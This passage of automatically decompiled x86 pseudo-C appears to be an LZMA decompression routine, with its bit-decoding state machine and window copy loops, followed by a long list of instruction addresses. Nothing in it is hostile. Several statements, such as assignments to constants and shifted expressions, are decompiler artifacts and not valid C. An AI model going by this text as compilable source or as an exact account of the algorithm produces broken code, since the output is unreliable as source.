												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406bc4
0x00406bc4
0x00406bc8
0x00406be9
0x00406bf0
0x00406bf6
0x00406bfc
0x00406c0e
0x00406c14
0x00406c19
0x00000000
0x00406bca
0x00406bd0
0x00406f91
0x00406f91
0x00406f91
0x00406f94
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00407195
0x004071ab
0x004071b3
0x004071ba
0x004071bc
0x004071c3
0x004071c7
0x004071c7
0x00406ff2
0x00406ff9
0x00407001
0x00407004
0x00407007
0x00407007
0x0040700d
0x0040700d
0x004067a9
0x004067a9
0x004067a9
0x004067b2
0x00000000
0x00000000
0x004067b8
0x00000000
0x004067c3
0x00000000
0x00000000
0x004067cc
0x004067cf
0x004067d2
0x004067d6
0x00000000
0x00000000
0x004067dc
0x004067df
0x004067e1
0x004067e2
0x004067e5
0x004067e7
0x004067e8
0x004067ea
0x004067ed
0x004067f2
0x004067f7
0x00406800
0x00406813
0x00406816
0x00406822
0x0040684a
0x0040684c
0x0040685a
0x0040685a
0x0040685e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040684e
0x0040684e
0x00406851
0x00406852
0x00406852
0x00000000
0x0040684e
0x00406828
0x0040682d
0x0040682d
0x00406836
0x0040683e
0x00406841
0x00000000
0x00406847
0x00406847
0x00000000
0x00406847
0x00000000
0x00406864
0x00406864
0x00406868
0x00407114
0x00000000
0x00407114
0x00406871
0x00406881
0x00406884
0x00406887
0x00406887
0x00406887
0x0040688a
0x0040688e
0x00000000
0x00000000
0x00406890
0x00406896
0x004068c0
0x004068c6
0x004068cd
0x00000000
0x004068cd
0x0040689c
0x0040689f
0x004068a4
0x004068a4
0x004068af
0x004068b7
0x004068ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068ff
0x00406905
0x00406908
0x00406915
0x0040691d
0x00000000
0x00000000
0x004068d4
0x004068d4
0x004068d8
0x00407123
0x00000000
0x00407123
0x004068e4
0x004068ef
0x004068ef
0x004068ef
0x004068f2
0x004068f5
0x004068f8
0x004068fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406925
0x00406927
0x0040692a
0x0040699b
0x0040699e
0x004069a1
0x004069a8
0x004069b2
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x0040692c
0x00406930
0x00406933
0x00406935
0x00406938
0x0040693b
0x0040693d
0x00406940
0x00406942
0x00406947
0x0040694a
0x0040694d
0x00406951
0x00406958
0x0040695b
0x00406962
0x00406966
0x0040696e
0x0040696e
0x0040696e
0x00406968
0x00406968
0x00406968
0x0040695d
0x0040695d
0x0040695d
0x00406972
0x00406975
0x00406993
0x00406995
0x00000000
0x00406977
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406982
0x00406982
0x00406982
0x00406985
0x00406988
0x0040698a
0x0040698b
0x0040698e
0x00000000
0x0040698e
0x00000000
0x00000000
0x00000000
0x00406c2e
0x00406c32
0x00406c55
0x00406c58
0x00406c5b
0x00406c65
0x00406c34
0x00406c34
0x00406c37
0x00406c3a
0x00406c3d
0x00406c4a
0x00406c4d
0x00406c4d
0x00406f91
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00000000
0x00406c71
0x00406c75
0x00000000
0x00000000
0x00406c7b
0x00406c7f
0x00000000
0x00000000
0x00406c85
0x00406c87
0x00406c8b
0x00406c8b
0x00406c8e
0x00406c92
0x00000000
0x00000000
0x00406ce2
0x00406ce6
0x00406ced
0x00406cf0
0x00406cf3
0x00406cfd
0x00406f91
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f91
0x00406ce8
0x00000000
0x00000000
0x00406d09
0x00406d0d
0x00406d14
0x00406d17
0x00406d1a
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d1d
0x00406d20
0x00406d23
0x00406d23
0x00406d26
0x00406d29
0x00406d2c
0x00406d2c
0x00406d2f
0x00406d36
0x00406d3b
0x00000000
0x00000000
0x00406dc9
0x00406dc9
0x00406dcd
0x0040716b
0x00000000
0x0040716b
0x00406dd3
0x00406dd6
0x00406dd9
0x00406ddd
0x00406de0
0x00406de6
0x00406de8
0x00406de8
0x00406de8
0x00406deb
0x00406dee
0x00000000
0x00000000
0x004069be
0x004069be
0x004069c2
0x0040712f
0x00000000
0x0040712f
0x004069c8
0x004069cb
0x004069ce
0x004069d2
0x004069d5
0x004069db
0x004069dd
0x004069dd
0x004069dd
0x004069e0
0x004069e3
0x004069e3
0x004069e6
0x004069e9
0x00000000
0x00000000
0x004069ef
0x004069f5
0x00000000
0x00000000
0x004069fb
0x004069fb
0x004069ff
0x00406a02
0x00406a05
0x00406a08
0x00406a0b
0x00406a0c
0x00406a0f
0x00406a11
0x00406a17
0x00406a1a
0x00406a1d
0x00406a20
0x00406a23
0x00406a26
0x00406a29
0x00406a45
0x00406a48
0x00406a4b
0x00406a4e
0x00406a55
0x00406a59
0x00406a5b
0x00406a5f
0x00406a2b
0x00406a2b
0x00406a2f
0x00406a37
0x00406a3c
0x00406a3e
0x00406a40
0x00406a40
0x00406a62
0x00406a69
0x00406a6c
0x00000000
0x00406a72
0x00000000
0x00406a72
0x00000000
0x00406a77
0x00406a77
0x00406a7b
0x0040713b
0x00000000
0x0040713b
0x00406a81
0x00406a84
0x00406a87
0x00406a8b
0x00406a8e
0x00406a94
0x00406a96
0x00406a96
0x00406a96
0x00406a99
0x00406a9c
0x00406a9c
0x00406a9c
0x00406aa2
0x00000000
0x00000000
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406ada
0x00406add
0x00406ae0
0x00406ae3
0x00406ae3
0x00406ae6
0x00406aea
0x00406aec
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad5
0x00406ad5
0x00406aef
0x00406af6
0x00406af9
0x00000000
0x00406afb
0x00000000
0x00406afb
0x00406af9
0x00406b00
0x00406b00
0x00406b00
0x00406b00
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407147
0x00000000
0x00407147
0x00406b45
0x00406b48
0x00406b4b
0x00406b4f
0x00406b52
0x00406b58
0x00406b5a
0x00406b5a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b66
0x00406b04
0x00406b04
0x00406b07
0x00000000
0x00406b07
0x00406b68
0x00406b68
0x00406b6b
0x00406b6e
0x00406b71
0x00406b74
0x00406b77
0x00406b7a
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b9e
0x00406ba1
0x00406ba4
0x00406ba7
0x00406ba7
0x00406baa
0x00406bae
0x00406bb0
0x00406b88
0x00406b88
0x00406b90
0x00406b95
0x00406b97
0x00406b99
0x00406b99
0x00406bb3
0x00406bba
0x00406bbd
0x00000000
0x00406bbf
0x00000000
0x00406bbf
0x00000000
0x00406e4c
0x00406e4c
0x00406e50
0x00407177
0x00000000
0x00407177
0x00406e56
0x00406e59
0x00406e5c
0x00406e60
0x00406e63
0x00406e69
0x00406e6b
0x00406e6b
0x00406e6b
0x00406e6e
0x00000000
0x00000000
0x00406c1c
0x00406c1c
0x00406c1f
0x00406f91
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00000000
0x00406f5b
0x00406f5f
0x00406f81
0x00406f84
0x00406f8e
0x00406f91
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f91
0x00406f61
0x00406f64
0x00406f68
0x00406f6b
0x00406f6b
0x00406f6e
0x00000000
0x00000000
0x00407018
0x0040701c
0x0040703a
0x0040703a
0x0040703a
0x00407041
0x00407048
0x0040704f
0x0040704f
0x00000000
0x0040704f
0x0040701e
0x00407021
0x00407024
0x00407027
0x0040702e
0x00406f72
0x00406f72
0x00406f75
0x00000000
0x00000000
0x00407109
0x0040710c
0x0040700d
0x00000000
0x00000000
0x00406d43
0x00406d45
0x00406d4c
0x00406d4d
0x00406d4f
0x00406d52
0x00000000
0x00000000
0x00406d5a
0x00406d5d
0x00406d60
0x00406d62
0x00406d64
0x00406d64
0x00406d65
0x00406d68
0x00406d6f
0x00406d72
0x00406d80
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00407060
0x00000000
0x00000000
0x00407065
0x00407065
0x00407069
0x004071a1
0x00000000
0x004071a1
0x0040706f
0x00407072
0x00407075
0x00407079
0x0040707c
0x00407082
0x00407084
0x00407084
0x00407084
0x00407087
0x0040708a
0x0040708a
0x0040708a
0x0040708a
0x0040708d
0x0040708d
0x00407091
0x004070f1
0x004070f4
0x004070f9
0x004070fa
0x004070fc
0x004070fe
0x00407101
0x0040700d
0x0040700d
0x00000000
0x00407013
0x0040700d
0x00407093
0x00407099
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x004070b1
0x004070b4
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070da
0x004070dc
0x004070dc
0x004070dd
0x004070e0
0x004070b6
0x004070b6
0x004070be
0x004070c3
0x004070c5
0x004070c8
0x004070c8
0x004070e3
0x004070ea
0x00000000
0x004070ec
0x00000000
0x004070ec
0x00000000
0x00406d88
0x00406d8b
0x00406dc1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef4
0x00406ef7
0x00406ef9
0x00407183
0x00000000
0x00407183
0x00406eff
0x00406f02
0x00000000
0x00000000
0x00406f08
0x00406f0c
0x00406f0f
0x00406f0f
0x00406f0f
0x00000000
0x00406f0f
0x00406d8d
0x00406d8f
0x00406d91
0x00406d93
0x00406d96
0x00406d97
0x00406d99
0x00406d9b
0x00406d9e
0x00406da1
0x00406db7
0x00406dbc
0x00406df4
0x00406df4
0x00406df8
0x00406e24
0x00406e26
0x00406e2d
0x00406e30
0x00406e33
0x00406e33
0x00406e38
0x00406e38
0x00406e3a
0x00406e3d
0x00406e44
0x00406e47
0x00406e74
0x00406e74
0x00406e77
0x00406e7a
0x00406eee
0x00406eee
0x00406eee
0x00000000
0x00406eee
0x00406e7c
0x00406e82
0x00406e85
0x00406e88
0x00406e8b
0x00406e8e
0x00406e91
0x00406e94
0x00406e97
0x00406e9a
0x00406e9d
0x00406eb6
0x00406eb8
0x00406ebb
0x00406ebc
0x00406ebf
0x00406ec1
0x00406ec4
0x00406ec6
0x00406ec8
0x00406ecb
0x00406ecd
0x00406ed0
0x00406ed4
0x00406ed6
0x00406ed6
0x00406ed7
0x00406eda
0x00406edd
0x00406e9f
0x00406e9f
0x00406ea7
0x00406eac
0x00406eae
0x00406eb1
0x00406eb1
0x00406ee0
0x00406ee7
0x00406e71
0x00406e71
0x00406e71
0x00406e71
0x00000000
0x00406ee9
0x00000000
0x00406ee9
0x00406ee7
0x00406dfa
0x00406dfd
0x00406dff
0x00406e02
0x00406e05
0x00406e08
0x00406e0a
0x00406e0d
0x00406e10
0x00406e10
0x00406e13
0x00406e13
0x00406e16
0x00406e1d
0x00406df1
0x00406df1
0x00406df1
0x00406df1
0x00000000
0x00406e1f
0x00000000
0x00406e1f
0x00406e1d
0x00406da3
0x00406da6
0x00406da8
0x00406dab
0x00000000
